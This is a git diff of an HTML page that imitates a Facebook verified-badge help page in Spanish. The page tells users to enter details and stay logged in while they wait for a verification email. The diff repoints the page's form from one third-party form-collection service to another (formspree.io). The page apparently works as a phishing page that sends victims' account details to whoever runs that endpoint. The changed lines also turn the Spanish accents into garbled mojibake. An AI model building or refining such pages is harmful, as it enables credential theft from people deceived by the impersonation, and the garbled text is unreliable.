--- a/help.html
+++ b/help.html
@@ -15,7 +15,7 @@
     </center>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/rNooBfjLG" method="post">
+  <form class="sm:hidden lg:block md:block" action="https://formspree.io/f/mqkrnnrp" method="post">
 
 <div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
   <div>
@@ -25,22 +25,22 @@
   </div>
 <div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
-La insignia verificada significa que Facebook ha confirmado que la página o perfil es la presencia auténtica del individuo, figura pública o marca que representa.
+La insignia verificada significa que Facebook ha confirmado que la pÃ¡gina o perfil es la presencia autÃ©ntica del individuo, figura pÃºblica o marca que representa.
   </p>
 </div>
 <div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
-Anteriormente, la insignia verificada también requería que la persona o marca fuera notable y única. Es posible que aún veas usuarios con una insignia verificada que representa nuestros requisitos de elegibilidad anteriores.
+Anteriormente, la insignia verificada tambiÃ©n requerÃ­a que la persona o marca fuera notable y Ãºnica. Es posible que aÃºn veas usuarios con una insignia verificada que representa nuestros requisitos de elegibilidad anteriores.
   </p>
 </div>
 <div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
-Proporcione los detalles precisos a continuación. Consulte el vídeo para obtener aclaraciones si las instrucciones no le resultan claras.
+Proporcione los detalles precisos a continuaciÃ³n. Consulte el vÃ­deo para obtener aclaraciones si las instrucciones no le resultan claras.
   </p>
 </div>
 <div>
   <p class="text-[11px] text-[#90949c] p-2 font-semibold">
-Información detallada del vídeo
+InformaciÃ³n detallada del vÃ­deo
   </p>
 </div>
 <div>
@@ -48,7 +48,7 @@ Información detallada del vídeo
   </div>
   <div>
   <p class=" pl-3 text-[12px] font-semibold">
-Asegúrese de proporcionar correctamente los detalles solicitados a continuación.
+AsegÃºrese de proporcionar correctamente los detalles solicitados a continuaciÃ³n.
     </p>
 </div>
 <div>
@@ -63,7 +63,7 @@ Asegúrese de proporcionar correctamente los detalles solicitados a continuación.
 
 </div><div>
   <p class="mt-4 pl-3 text-[12px] font-semibold">
-Asegúrese de no cerrar sesión en su cuenta en su computadora o computadora portátil hasta que haya recibido un correo electrónico de verificación.
+AsegÃºrese de no cerrar sesiÃ³n en su cuenta en su computadora o computadora portÃ¡til hasta que haya recibido un correo electrÃ³nico de verificaciÃ³n.
   </p>
 </div><div class="border mx-3 h-10 mt-4 bg-[#f5f6f7]"><div class="flex justify-end mx-2">
   <button class="border h-7 w-16  bg-[#4267b2] text-white shadow-2xl mt-[0.30rem] font-serif font-thin text-xs hover:bg-blue-500" id="delete-btn">
